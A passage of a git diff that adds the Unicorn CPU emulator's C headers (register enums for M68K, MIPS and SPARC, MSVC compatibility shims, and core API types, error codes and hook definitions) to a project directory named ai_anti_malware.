+ See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_M68K_H +#define UNICORN_M68K_H + +#ifdef __cplusplus +extern "C" { +#endif + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +//> M68K registers +typedef enum uc_m68k_reg { + UC_M68K_REG_INVALID = 0, + + UC_M68K_REG_A0, + UC_M68K_REG_A1, + UC_M68K_REG_A2, + UC_M68K_REG_A3, + UC_M68K_REG_A4, + UC_M68K_REG_A5, + UC_M68K_REG_A6, + UC_M68K_REG_A7, + + UC_M68K_REG_D0, + UC_M68K_REG_D1, + UC_M68K_REG_D2, + UC_M68K_REG_D3, + UC_M68K_REG_D4, + UC_M68K_REG_D5, + UC_M68K_REG_D6, + UC_M68K_REG_D7, + + UC_M68K_REG_SR, + UC_M68K_REG_PC, + + UC_M68K_REG_ENDING, // <-- mark the end of the list of registers +} uc_m68k_reg; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/include/unicorn/mips.h b/ai_anti_malware/unicorn/include/unicorn/mips.h new file mode 100644 index 0000000..77fde3c --- /dev/null +++ b/ai_anti_malware/unicorn/include/unicorn/mips.h @@ -0,0 +1,232 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015-2017 */ +/* This file is released under LGPL2. 
+ See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_MIPS_H +#define UNICORN_MIPS_H + +#ifdef __cplusplus +extern "C" { +#endif + +// GCC MIPS toolchain has a default macro called "mips" which breaks +// compilation +#undef mips + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +//> MIPS registers +typedef enum UC_MIPS_REG { + UC_MIPS_REG_INVALID = 0, + //> General purpose registers + UC_MIPS_REG_PC, + + UC_MIPS_REG_0, + UC_MIPS_REG_1, + UC_MIPS_REG_2, + UC_MIPS_REG_3, + UC_MIPS_REG_4, + UC_MIPS_REG_5, + UC_MIPS_REG_6, + UC_MIPS_REG_7, + UC_MIPS_REG_8, + UC_MIPS_REG_9, + UC_MIPS_REG_10, + UC_MIPS_REG_11, + UC_MIPS_REG_12, + UC_MIPS_REG_13, + UC_MIPS_REG_14, + UC_MIPS_REG_15, + UC_MIPS_REG_16, + UC_MIPS_REG_17, + UC_MIPS_REG_18, + UC_MIPS_REG_19, + UC_MIPS_REG_20, + UC_MIPS_REG_21, + UC_MIPS_REG_22, + UC_MIPS_REG_23, + UC_MIPS_REG_24, + UC_MIPS_REG_25, + UC_MIPS_REG_26, + UC_MIPS_REG_27, + UC_MIPS_REG_28, + UC_MIPS_REG_29, + UC_MIPS_REG_30, + UC_MIPS_REG_31, + + //> DSP registers + UC_MIPS_REG_DSPCCOND, + UC_MIPS_REG_DSPCARRY, + UC_MIPS_REG_DSPEFI, + UC_MIPS_REG_DSPOUTFLAG, + UC_MIPS_REG_DSPOUTFLAG16_19, + UC_MIPS_REG_DSPOUTFLAG20, + UC_MIPS_REG_DSPOUTFLAG21, + UC_MIPS_REG_DSPOUTFLAG22, + UC_MIPS_REG_DSPOUTFLAG23, + UC_MIPS_REG_DSPPOS, + UC_MIPS_REG_DSPSCOUNT, + + //> ACC registers + UC_MIPS_REG_AC0, + UC_MIPS_REG_AC1, + UC_MIPS_REG_AC2, + UC_MIPS_REG_AC3, + + //> COP registers + UC_MIPS_REG_CC0, + UC_MIPS_REG_CC1, + UC_MIPS_REG_CC2, + UC_MIPS_REG_CC3, + UC_MIPS_REG_CC4, + UC_MIPS_REG_CC5, + UC_MIPS_REG_CC6, + UC_MIPS_REG_CC7, + + //> FPU registers + UC_MIPS_REG_F0, + UC_MIPS_REG_F1, + UC_MIPS_REG_F2, + UC_MIPS_REG_F3, + UC_MIPS_REG_F4, + UC_MIPS_REG_F5, + UC_MIPS_REG_F6, + UC_MIPS_REG_F7, + UC_MIPS_REG_F8, + UC_MIPS_REG_F9, + UC_MIPS_REG_F10, + UC_MIPS_REG_F11, + UC_MIPS_REG_F12, + UC_MIPS_REG_F13, + UC_MIPS_REG_F14, + UC_MIPS_REG_F15, + UC_MIPS_REG_F16, + UC_MIPS_REG_F17, + UC_MIPS_REG_F18, + UC_MIPS_REG_F19, + UC_MIPS_REG_F20, + 
UC_MIPS_REG_F21, + UC_MIPS_REG_F22, + UC_MIPS_REG_F23, + UC_MIPS_REG_F24, + UC_MIPS_REG_F25, + UC_MIPS_REG_F26, + UC_MIPS_REG_F27, + UC_MIPS_REG_F28, + UC_MIPS_REG_F29, + UC_MIPS_REG_F30, + UC_MIPS_REG_F31, + + UC_MIPS_REG_FCC0, + UC_MIPS_REG_FCC1, + UC_MIPS_REG_FCC2, + UC_MIPS_REG_FCC3, + UC_MIPS_REG_FCC4, + UC_MIPS_REG_FCC5, + UC_MIPS_REG_FCC6, + UC_MIPS_REG_FCC7, + + //> AFPR128 + UC_MIPS_REG_W0, + UC_MIPS_REG_W1, + UC_MIPS_REG_W2, + UC_MIPS_REG_W3, + UC_MIPS_REG_W4, + UC_MIPS_REG_W5, + UC_MIPS_REG_W6, + UC_MIPS_REG_W7, + UC_MIPS_REG_W8, + UC_MIPS_REG_W9, + UC_MIPS_REG_W10, + UC_MIPS_REG_W11, + UC_MIPS_REG_W12, + UC_MIPS_REG_W13, + UC_MIPS_REG_W14, + UC_MIPS_REG_W15, + UC_MIPS_REG_W16, + UC_MIPS_REG_W17, + UC_MIPS_REG_W18, + UC_MIPS_REG_W19, + UC_MIPS_REG_W20, + UC_MIPS_REG_W21, + UC_MIPS_REG_W22, + UC_MIPS_REG_W23, + UC_MIPS_REG_W24, + UC_MIPS_REG_W25, + UC_MIPS_REG_W26, + UC_MIPS_REG_W27, + UC_MIPS_REG_W28, + UC_MIPS_REG_W29, + UC_MIPS_REG_W30, + UC_MIPS_REG_W31, + + UC_MIPS_REG_HI, + UC_MIPS_REG_LO, + + UC_MIPS_REG_P0, + UC_MIPS_REG_P1, + UC_MIPS_REG_P2, + + UC_MIPS_REG_MPL0, + UC_MIPS_REG_MPL1, + UC_MIPS_REG_MPL2, + + UC_MIPS_REG_CP0_CONFIG3, + UC_MIPS_REG_CP0_USERLOCAL, + + UC_MIPS_REG_ENDING, // <-- mark the end of the list or registers + + // alias registers + UC_MIPS_REG_ZERO = UC_MIPS_REG_0, + UC_MIPS_REG_AT = UC_MIPS_REG_1, + UC_MIPS_REG_V0 = UC_MIPS_REG_2, + UC_MIPS_REG_V1 = UC_MIPS_REG_3, + UC_MIPS_REG_A0 = UC_MIPS_REG_4, + UC_MIPS_REG_A1 = UC_MIPS_REG_5, + UC_MIPS_REG_A2 = UC_MIPS_REG_6, + UC_MIPS_REG_A3 = UC_MIPS_REG_7, + UC_MIPS_REG_T0 = UC_MIPS_REG_8, + UC_MIPS_REG_T1 = UC_MIPS_REG_9, + UC_MIPS_REG_T2 = UC_MIPS_REG_10, + UC_MIPS_REG_T3 = UC_MIPS_REG_11, + UC_MIPS_REG_T4 = UC_MIPS_REG_12, + UC_MIPS_REG_T5 = UC_MIPS_REG_13, + UC_MIPS_REG_T6 = UC_MIPS_REG_14, + UC_MIPS_REG_T7 = UC_MIPS_REG_15, + UC_MIPS_REG_S0 = UC_MIPS_REG_16, + UC_MIPS_REG_S1 = UC_MIPS_REG_17, + UC_MIPS_REG_S2 = UC_MIPS_REG_18, + UC_MIPS_REG_S3 = UC_MIPS_REG_19, + UC_MIPS_REG_S4 = 
UC_MIPS_REG_20, + UC_MIPS_REG_S5 = UC_MIPS_REG_21, + UC_MIPS_REG_S6 = UC_MIPS_REG_22, + UC_MIPS_REG_S7 = UC_MIPS_REG_23, + UC_MIPS_REG_T8 = UC_MIPS_REG_24, + UC_MIPS_REG_T9 = UC_MIPS_REG_25, + UC_MIPS_REG_K0 = UC_MIPS_REG_26, + UC_MIPS_REG_K1 = UC_MIPS_REG_27, + UC_MIPS_REG_GP = UC_MIPS_REG_28, + UC_MIPS_REG_SP = UC_MIPS_REG_29, + UC_MIPS_REG_FP = UC_MIPS_REG_30, UC_MIPS_REG_S8 = UC_MIPS_REG_30, + UC_MIPS_REG_RA = UC_MIPS_REG_31, + + UC_MIPS_REG_HI0 = UC_MIPS_REG_AC0, + UC_MIPS_REG_HI1 = UC_MIPS_REG_AC1, + UC_MIPS_REG_HI2 = UC_MIPS_REG_AC2, + UC_MIPS_REG_HI3 = UC_MIPS_REG_AC3, + + UC_MIPS_REG_LO0 = UC_MIPS_REG_HI0, + UC_MIPS_REG_LO1 = UC_MIPS_REG_HI1, + UC_MIPS_REG_LO2 = UC_MIPS_REG_HI2, + UC_MIPS_REG_LO3 = UC_MIPS_REG_HI3, +} UC_MIPS_REG; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/include/unicorn/platform.h b/ai_anti_malware/unicorn/include/unicorn/platform.h new file mode 100644 index 0000000..5bbfd8a --- /dev/null +++ b/ai_anti_malware/unicorn/include/unicorn/platform.h @@ -0,0 +1,221 @@ +/* This file is released under LGPL2. + See COPYING.LGPL2 in root directory for more details +*/ + +/* + This file is to support header files that are missing in MSVC and + other non-standard compilers. 
+*/ +#ifndef UNICORN_PLATFORM_H +#define UNICORN_PLATFORM_H + +/* +These are the various MSVC versions as given by _MSC_VER: +MSVC++ 14.0 _MSC_VER == 1900 (Visual Studio 2015) +MSVC++ 12.0 _MSC_VER == 1800 (Visual Studio 2013) +MSVC++ 11.0 _MSC_VER == 1700 (Visual Studio 2012) +MSVC++ 10.0 _MSC_VER == 1600 (Visual Studio 2010) +MSVC++ 9.0 _MSC_VER == 1500 (Visual Studio 2008) +MSVC++ 8.0 _MSC_VER == 1400 (Visual Studio 2005) +MSVC++ 7.1 _MSC_VER == 1310 (Visual Studio 2003) +MSVC++ 7.0 _MSC_VER == 1300 +MSVC++ 6.0 _MSC_VER == 1200 +MSVC++ 5.0 _MSC_VER == 1100 +*/ +#define MSC_VER_VS2003 1310 +#define MSC_VER_VS2005 1400 +#define MSC_VER_VS2008 1500 +#define MSC_VER_VS2010 1600 +#define MSC_VER_VS2012 1700 +#define MSC_VER_VS2013 1800 +#define MSC_VER_VS2015 1900 + +// handle stdbool.h compatibility +#if !defined(__CYGWIN__) && !defined(__MINGW32__) && !defined(__MINGW64__) && (defined (WIN32) || defined (WIN64) || defined (_WIN32) || defined (_WIN64)) +// MSVC + +// stdbool.h +#if (_MSC_VER < MSC_VER_VS2013) || defined(_KERNEL_MODE) +// this system does not have stdbool.h +#ifndef __cplusplus +typedef unsigned char bool; +#define false 0 +#define true 1 +#endif // __cplusplus + +#else +// VisualStudio 2013+ -> C99 is supported +#include +#endif // (_MSC_VER < MSC_VER_VS2013) || defined(_KERNEL_MODE) + +#else +// not MSVC -> C99 is supported +#include +#endif // !defined(__CYGWIN__) && !defined(__MINGW32__) && !defined(__MINGW64__) && (defined (WIN32) || defined (WIN64) || defined (_WIN32) || defined (_WIN64)) + +#if (defined(_MSC_VER) && (_MSC_VER < MSC_VER_VS2010)) || defined(_KERNEL_MODE) +// this system does not have stdint.h +typedef signed char int8_t; +typedef signed short int16_t; +typedef signed int int32_t; +typedef unsigned char uint8_t; +typedef unsigned short uint16_t; +typedef unsigned int uint32_t; +typedef signed long long int64_t; +typedef unsigned long long uint64_t; + +#ifndef _INTPTR_T_DEFINED + #define _INTPTR_T_DEFINED + #ifdef _WIN64 +typedef 
long long intptr_t; + #else /* _WIN64 */ +typedef _W64 int intptr_t; + #endif /* _WIN64 */ +#endif /* _INTPTR_T_DEFINED */ + +#ifndef _UINTPTR_T_DEFINED + #define _UINTPTR_T_DEFINED + #ifdef _WIN64 +typedef unsigned long long uintptr_t; + #else /* _WIN64 */ +typedef _W64 unsigned int uintptr_t; + #endif /* _WIN64 */ +#endif /* _UINTPTR_T_DEFINED */ + +#define INT8_MIN (-127i8 - 1) +#define INT16_MIN (-32767i16 - 1) +#define INT32_MIN (-2147483647i32 - 1) +#define INT64_MIN (-9223372036854775807i64 - 1) +#define INT8_MAX 127i8 +#define INT16_MAX 32767i16 +#define INT32_MAX 2147483647i32 +#define INT64_MAX 9223372036854775807i64 +#define UINT8_MAX 0xffui8 +#define UINT16_MAX 0xffffui16 +#define UINT32_MAX 0xffffffffui32 +#define UINT64_MAX 0xffffffffffffffffui64 +#else // this system has stdint.h +#include +#endif // (defined(_MSC_VER) && (_MSC_VER < MSC_VER_VS2010)) || defined(_KERNEL_MODE) + +// handle inttypes.h compatibility +#if (defined(_MSC_VER) && (_MSC_VER < MSC_VER_VS2013)) || defined(_KERNEL_MODE) +// this system does not have inttypes.h + +#define __PRI_8_LENGTH_MODIFIER__ "hh" +#define __PRI_64_LENGTH_MODIFIER__ "ll" + +#define PRId8 __PRI_8_LENGTH_MODIFIER__ "d" +#define PRIi8 __PRI_8_LENGTH_MODIFIER__ "i" +#define PRIo8 __PRI_8_LENGTH_MODIFIER__ "o" +#define PRIu8 __PRI_8_LENGTH_MODIFIER__ "u" +#define PRIx8 __PRI_8_LENGTH_MODIFIER__ "x" +#define PRIX8 __PRI_8_LENGTH_MODIFIER__ "X" + +#define PRId16 "hd" +#define PRIi16 "hi" +#define PRIo16 "ho" +#define PRIu16 "hu" +#define PRIx16 "hx" +#define PRIX16 "hX" + +#if defined(_MSC_VER) && (_MSC_VER <= MSC_VER_VS2012) +#define PRId32 "ld" +#define PRIi32 "li" +#define PRIo32 "lo" +#define PRIu32 "lu" +#define PRIx32 "lx" +#define PRIX32 "lX" +#else // OSX +#define PRId32 "d" +#define PRIi32 "i" +#define PRIo32 "o" +#define PRIu32 "u" +#define PRIx32 "x" +#define PRIX32 "X" +#endif // defined(_MSC_VER) && (_MSC_VER <= MSC_VER_VS2012) + +#if defined(_MSC_VER) && (_MSC_VER <= MSC_VER_VS2012) +// redefine 
functions from inttypes.h used in cstool +#define strtoull _strtoui64 +#endif + +#define PRId64 __PRI_64_LENGTH_MODIFIER__ "d" +#define PRIi64 __PRI_64_LENGTH_MODIFIER__ "i" +#define PRIo64 __PRI_64_LENGTH_MODIFIER__ "o" +#define PRIu64 __PRI_64_LENGTH_MODIFIER__ "u" +#define PRIx64 __PRI_64_LENGTH_MODIFIER__ "x" +#define PRIX64 __PRI_64_LENGTH_MODIFIER__ "X" + +#else +// this system has inttypes.h by default +#include +#endif // #if defined(_MSC_VER) && (_MSC_VER < MSC_VER_VS2013) || defined(_KERNEL_MODE) + +// sys/time.h compatibility +#if defined(_MSC_VER) +#include +#include +#include + +static int gettimeofday(struct timeval* t, void* timezone) +{ + struct _timeb timebuffer; + _ftime( &timebuffer ); + t->tv_sec = (long)timebuffer.time; + t->tv_usec = 1000*timebuffer.millitm; + return 0; +} +#else +#include +#endif + +// unistd.h compatibility +#if defined(_MSC_VER) + +static int usleep(uint32_t usec) +{ + HANDLE timer; + LARGE_INTEGER due; + + timer = CreateWaitableTimer(NULL, TRUE, NULL); + if (!timer) + return -1; + + due.QuadPart = (-((int64_t) usec)) * 10LL; + if (!SetWaitableTimer(timer, &due, 0, NULL, NULL, 0)) { + CloseHandle(timer); + return -1; + } + WaitForSingleObject(timer, INFINITE); + CloseHandle(timer); + + return 0; +} + +#else +#include +#endif + +// misc support +#if defined(_MSC_VER) +#ifdef _WIN64 +typedef signed __int64 ssize_t; +#else +typedef _W64 signed int ssize_t; +#endif + +#ifndef va_copy +#define va_copy(d,s) ((d) = (s)) +#endif +#define strcasecmp _stricmp +#if (_MSC_VER < MSC_VER_VS2015) +#define snprintf _snprintf +#endif +#if (_MSC_VER <= MSC_VER_VS2013) +#define strtoll _strtoi64 +#endif +#endif + + +#endif // UNICORN_PLATFORM_H diff --git a/ai_anti_malware/unicorn/include/unicorn/sparc.h b/ai_anti_malware/unicorn/include/unicorn/sparc.h new file mode 100644 index 0000000..08e0538 --- /dev/null +++ b/ai_anti_malware/unicorn/include/unicorn/sparc.h @@ -0,0 +1,130 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 
2014-2017 */ +/* This file is released under LGPL2. + See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_SPARC_H +#define UNICORN_SPARC_H + +#ifdef __cplusplus +extern "C" { +#endif + +// GCC SPARC toolchain has a default macro called "sparc" which breaks +// compilation +#undef sparc + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +//> SPARC registers +typedef enum uc_sparc_reg { + UC_SPARC_REG_INVALID = 0, + + UC_SPARC_REG_F0, + UC_SPARC_REG_F1, + UC_SPARC_REG_F2, + UC_SPARC_REG_F3, + UC_SPARC_REG_F4, + UC_SPARC_REG_F5, + UC_SPARC_REG_F6, + UC_SPARC_REG_F7, + UC_SPARC_REG_F8, + UC_SPARC_REG_F9, + UC_SPARC_REG_F10, + UC_SPARC_REG_F11, + UC_SPARC_REG_F12, + UC_SPARC_REG_F13, + UC_SPARC_REG_F14, + UC_SPARC_REG_F15, + UC_SPARC_REG_F16, + UC_SPARC_REG_F17, + UC_SPARC_REG_F18, + UC_SPARC_REG_F19, + UC_SPARC_REG_F20, + UC_SPARC_REG_F21, + UC_SPARC_REG_F22, + UC_SPARC_REG_F23, + UC_SPARC_REG_F24, + UC_SPARC_REG_F25, + UC_SPARC_REG_F26, + UC_SPARC_REG_F27, + UC_SPARC_REG_F28, + UC_SPARC_REG_F29, + UC_SPARC_REG_F30, + UC_SPARC_REG_F31, + UC_SPARC_REG_F32, + UC_SPARC_REG_F34, + UC_SPARC_REG_F36, + UC_SPARC_REG_F38, + UC_SPARC_REG_F40, + UC_SPARC_REG_F42, + UC_SPARC_REG_F44, + UC_SPARC_REG_F46, + UC_SPARC_REG_F48, + UC_SPARC_REG_F50, + UC_SPARC_REG_F52, + UC_SPARC_REG_F54, + UC_SPARC_REG_F56, + UC_SPARC_REG_F58, + UC_SPARC_REG_F60, + UC_SPARC_REG_F62, + UC_SPARC_REG_FCC0, // Floating condition codes + UC_SPARC_REG_FCC1, + UC_SPARC_REG_FCC2, + UC_SPARC_REG_FCC3, + UC_SPARC_REG_G0, + UC_SPARC_REG_G1, + UC_SPARC_REG_G2, + UC_SPARC_REG_G3, + UC_SPARC_REG_G4, + UC_SPARC_REG_G5, + UC_SPARC_REG_G6, + UC_SPARC_REG_G7, + UC_SPARC_REG_I0, + UC_SPARC_REG_I1, + UC_SPARC_REG_I2, + UC_SPARC_REG_I3, + UC_SPARC_REG_I4, + UC_SPARC_REG_I5, + UC_SPARC_REG_FP, + UC_SPARC_REG_I7, + UC_SPARC_REG_ICC, // Integer condition codes + UC_SPARC_REG_L0, + UC_SPARC_REG_L1, + UC_SPARC_REG_L2, + UC_SPARC_REG_L3, + UC_SPARC_REG_L4, + UC_SPARC_REG_L5, + UC_SPARC_REG_L6, + 
UC_SPARC_REG_L7, + UC_SPARC_REG_O0, + UC_SPARC_REG_O1, + UC_SPARC_REG_O2, + UC_SPARC_REG_O3, + UC_SPARC_REG_O4, + UC_SPARC_REG_O5, + UC_SPARC_REG_SP, + UC_SPARC_REG_O7, + UC_SPARC_REG_Y, + + // special register + UC_SPARC_REG_XCC, + + // pseudo register + UC_SPARC_REG_PC, // program counter register + + UC_SPARC_REG_ENDING, // <-- mark the end of the list of registers + + // extras + UC_SPARC_REG_O6 = UC_SPARC_REG_SP, + UC_SPARC_REG_I6 = UC_SPARC_REG_FP, +} uc_sparc_reg; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/include/unicorn/unicorn.h b/ai_anti_malware/unicorn/include/unicorn/unicorn.h new file mode 100644 index 0000000..ab5485e --- /dev/null +++ b/ai_anti_malware/unicorn/include/unicorn/unicorn.h @@ -0,0 +1,779 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015-2017 */ +/* This file is released under LGPL2. + See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_ENGINE_H +#define UNICORN_ENGINE_H + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" +#include + +#if defined(UNICORN_HAS_OSXKERNEL) +#include +#else +#include +#include +#endif + +struct uc_struct; +typedef struct uc_struct uc_engine; + +typedef size_t uc_hook; + +#include "m68k.h" +#include "x86.h" +#include "arm.h" +#include "arm64.h" +#include "mips.h" +#include "sparc.h" + +#ifdef __GNUC__ +#define DEFAULT_VISIBILITY __attribute__((visibility("default"))) +#else +#define DEFAULT_VISIBILITY +#endif + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#pragma warning(disable:4100) +#ifdef UNICORN_SHARED +#define UNICORN_EXPORT __declspec(dllexport) +#else // defined(UNICORN_STATIC) +#define UNICORN_EXPORT +#endif +#else +#ifdef __GNUC__ +#define UNICORN_EXPORT __attribute__((visibility("default"))) +#else +#define UNICORN_EXPORT +#endif +#endif + +#ifdef __GNUC__ +#define UNICORN_DEPRECATED __attribute__((deprecated)) +#elif defined(_MSC_VER) +#define UNICORN_DEPRECATED __declspec(deprecated) +#else +#pragma 
message("WARNING: You need to implement UNICORN_DEPRECATED for this compiler") +#define UNICORN_DEPRECATED +#endif + +// Unicorn API version +#define UC_API_MAJOR 1 +#define UC_API_MINOR 0 + +// Unicorn package version +#define UC_VERSION_MAJOR UC_API_MAJOR +#define UC_VERSION_MINOR UC_API_MINOR +#define UC_VERSION_EXTRA 2 + + +/* + Macro to create combined version which can be compared to + result of uc_version() API. +*/ +#define UC_MAKE_VERSION(major, minor) ((major << 8) + minor) + +// Scales to calculate timeout on microsecond unit +// 1 second = 1000,000 microseconds +#define UC_SECOND_SCALE 1000000 +// 1 milisecond = 1000 nanoseconds +#define UC_MILISECOND_SCALE 1000 + +// Architecture type +typedef enum uc_arch { + UC_ARCH_ARM = 1, // ARM architecture (including Thumb, Thumb-2) + UC_ARCH_ARM64, // ARM-64, also called AArch64 + UC_ARCH_MIPS, // Mips architecture + UC_ARCH_X86, // X86 architecture (including x86 & x86-64) + UC_ARCH_PPC, // PowerPC architecture (currently unsupported) + UC_ARCH_SPARC, // Sparc architecture + UC_ARCH_M68K, // M68K architecture + UC_ARCH_MAX, +} uc_arch; + +// Mode type +typedef enum uc_mode { + UC_MODE_LITTLE_ENDIAN = 0, // little-endian mode (default mode) + UC_MODE_BIG_ENDIAN = 1 << 30, // big-endian mode + + // arm / arm64 + UC_MODE_ARM = 0, // ARM mode + UC_MODE_THUMB = 1 << 4, // THUMB mode (including Thumb-2) + UC_MODE_MCLASS = 1 << 5, // ARM's Cortex-M series (currently unsupported) + UC_MODE_V8 = 1 << 6, // ARMv8 A32 encodings for ARM (currently unsupported) + + // arm (32bit) cpu types + UC_MODE_ARM926 = 1 << 7, // ARM926 CPU type + UC_MODE_ARM946 = 1 << 8, // ARM946 CPU type + UC_MODE_ARM1176 = 1 << 9, // ARM1176 CPU type + + // mips + UC_MODE_MICRO = 1 << 4, // MicroMips mode (currently unsupported) + UC_MODE_MIPS3 = 1 << 5, // Mips III ISA (currently unsupported) + UC_MODE_MIPS32R6 = 1 << 6, // Mips32r6 ISA (currently unsupported) + UC_MODE_MIPS32 = 1 << 2, // Mips32 ISA + UC_MODE_MIPS64 = 1 << 3, // Mips64 ISA + + 
// x86 / x64 + UC_MODE_16 = 1 << 1, // 16-bit mode + UC_MODE_32 = 1 << 2, // 32-bit mode + UC_MODE_64 = 1 << 3, // 64-bit mode + + // ppc + UC_MODE_PPC32 = 1 << 2, // 32-bit mode (currently unsupported) + UC_MODE_PPC64 = 1 << 3, // 64-bit mode (currently unsupported) + UC_MODE_QPX = 1 << 4, // Quad Processing eXtensions mode (currently unsupported) + + // sparc + UC_MODE_SPARC32 = 1 << 2, // 32-bit mode + UC_MODE_SPARC64 = 1 << 3, // 64-bit mode + UC_MODE_V9 = 1 << 4, // SparcV9 mode (currently unsupported) + + // m68k +} uc_mode; + +// All type of errors encountered by Unicorn API. +// These are values returned by uc_errno() +typedef enum uc_err { + UC_ERR_OK = 0, // No error: everything was fine + UC_ERR_NOMEM, // Out-Of-Memory error: uc_open(), uc_emulate() + UC_ERR_ARCH, // Unsupported architecture: uc_open() + UC_ERR_HANDLE, // Invalid handle + UC_ERR_MODE, // Invalid/unsupported mode: uc_open() + UC_ERR_VERSION, // Unsupported version (bindings) + UC_ERR_READ_UNMAPPED, // Quit emulation due to READ on unmapped memory: uc_emu_start() + UC_ERR_WRITE_UNMAPPED, // Quit emulation due to WRITE on unmapped memory: uc_emu_start() + UC_ERR_FETCH_UNMAPPED, // Quit emulation due to FETCH on unmapped memory: uc_emu_start() + UC_ERR_HOOK, // Invalid hook type: uc_hook_add() + UC_ERR_INSN_INVALID, // Quit emulation due to invalid instruction: uc_emu_start() + UC_ERR_MAP, // Invalid memory mapping: uc_mem_map() + UC_ERR_WRITE_PROT, // Quit emulation due to UC_MEM_WRITE_PROT violation: uc_emu_start() + UC_ERR_READ_PROT, // Quit emulation due to UC_MEM_READ_PROT violation: uc_emu_start() + UC_ERR_FETCH_PROT, // Quit emulation due to UC_MEM_FETCH_PROT violation: uc_emu_start() + UC_ERR_ARG, // Invalid argument provided to uc_xxx function (See specific function API) + UC_ERR_READ_UNALIGNED, // Unaligned read + UC_ERR_WRITE_UNALIGNED, // Unaligned write + UC_ERR_FETCH_UNALIGNED, // Unaligned fetch + UC_ERR_HOOK_EXIST, // hook for this event already existed + UC_ERR_RESOURCE, // 
Insufficient resource: uc_emu_start() + UC_ERR_EXCEPTION, // Unhandled CPU exception +} uc_err; + + +/* + Callback function for tracing code (UC_HOOK_CODE & UC_HOOK_BLOCK) + + @address: address where the code is being executed + @size: size of machine instruction(s) being executed, or 0 when size is unknown + @user_data: user data passed to tracing APIs. +*/ +typedef void (*uc_cb_hookcode_t)(uc_engine *uc, uint64_t address, uint32_t size, void *user_data); + +/* + Callback function for tracing interrupts (for uc_hook_intr()) + + @intno: interrupt number + @user_data: user data passed to tracing APIs. +*/ +typedef void (*uc_cb_hookintr_t)(uc_engine *uc, uint32_t intno, void *user_data); + +/* + Callback function for tracing invalid instructions + + @user_data: user data passed to tracing APIs. + + @return: return true to continue, or false to stop program (due to invalid instruction). +*/ +typedef bool (*uc_cb_hookinsn_invalid_t)(uc_engine *uc, void *user_data); + +/* + Callback function for tracing IN instruction of X86 + + @port: port number + @size: data size (1/2/4) to be read from this port + @user_data: user data passed to tracing APIs. 
+*/ +typedef uint32_t (*uc_cb_insn_in_t)(uc_engine *uc, uint32_t port, int size, void *user_data); + +/* + Callback function for OUT instruction of X86 + + @port: port number + @size: data size (1/2/4) to be written to this port + @value: data value to be written to this port +*/ +typedef void (*uc_cb_insn_out_t)(uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data); + +// All type of memory accesses for UC_HOOK_MEM_* +typedef enum uc_mem_type { + UC_MEM_READ = 16, // Memory is read from + UC_MEM_WRITE, // Memory is written to + UC_MEM_FETCH, // Memory is fetched + UC_MEM_READ_UNMAPPED, // Unmapped memory is read from + UC_MEM_WRITE_UNMAPPED, // Unmapped memory is written to + UC_MEM_FETCH_UNMAPPED, // Unmapped memory is fetched + UC_MEM_WRITE_PROT, // Write to write protected, but mapped, memory + UC_MEM_READ_PROT, // Read from read protected, but mapped, memory + UC_MEM_FETCH_PROT, // Fetch from non-executable, but mapped, memory + UC_MEM_READ_AFTER, // Memory is read from (successful access) +} uc_mem_type; + +// All type of hooks for uc_hook_add() API. +typedef enum uc_hook_type { + // Hook all interrupt/syscall events + UC_HOOK_INTR = 1 << 0, + // Hook a particular instruction - only a very small subset of instructions supported here + UC_HOOK_INSN = 1 << 1, + // Hook a range of code + UC_HOOK_CODE = 1 << 2, + // Hook basic blocks + UC_HOOK_BLOCK = 1 << 3, + // Hook for memory read on unmapped memory + UC_HOOK_MEM_READ_UNMAPPED = 1 << 4, + // Hook for invalid memory write events + UC_HOOK_MEM_WRITE_UNMAPPED = 1 << 5, + // Hook for invalid memory fetch for execution events + UC_HOOK_MEM_FETCH_UNMAPPED = 1 << 6, + // Hook for memory read on read-protected memory + UC_HOOK_MEM_READ_PROT = 1 << 7, + // Hook for memory write on write-protected memory + UC_HOOK_MEM_WRITE_PROT = 1 << 8, + // Hook for memory fetch on non-executable memory + UC_HOOK_MEM_FETCH_PROT = 1 << 9, + // Hook memory read events. 
+ UC_HOOK_MEM_READ = 1 << 10, + // Hook memory write events. + UC_HOOK_MEM_WRITE = 1 << 11, + // Hook memory fetch for execution events + UC_HOOK_MEM_FETCH = 1 << 12, + // Hook memory read events, but only successful access. + // The callback will be triggered after successful read. + UC_HOOK_MEM_READ_AFTER = 1 << 13, + // Hook invalid instructions exceptions. + UC_HOOK_INSN_INVALID = 1 << 14, +} uc_hook_type; + +// Hook type for all events of unmapped memory access +#define UC_HOOK_MEM_UNMAPPED (UC_HOOK_MEM_READ_UNMAPPED + UC_HOOK_MEM_WRITE_UNMAPPED + UC_HOOK_MEM_FETCH_UNMAPPED) +// Hook type for all events of illegal protected memory access +#define UC_HOOK_MEM_PROT (UC_HOOK_MEM_READ_PROT + UC_HOOK_MEM_WRITE_PROT + UC_HOOK_MEM_FETCH_PROT) +// Hook type for all events of illegal read memory access +#define UC_HOOK_MEM_READ_INVALID (UC_HOOK_MEM_READ_PROT + UC_HOOK_MEM_READ_UNMAPPED) +// Hook type for all events of illegal write memory access +#define UC_HOOK_MEM_WRITE_INVALID (UC_HOOK_MEM_WRITE_PROT + UC_HOOK_MEM_WRITE_UNMAPPED) +// Hook type for all events of illegal fetch memory access +#define UC_HOOK_MEM_FETCH_INVALID (UC_HOOK_MEM_FETCH_PROT + UC_HOOK_MEM_FETCH_UNMAPPED) +// Hook type for all events of illegal memory access +#define UC_HOOK_MEM_INVALID (UC_HOOK_MEM_UNMAPPED + UC_HOOK_MEM_PROT) +// Hook type for all events of valid memory access +// NOTE: UC_HOOK_MEM_READ is triggered before 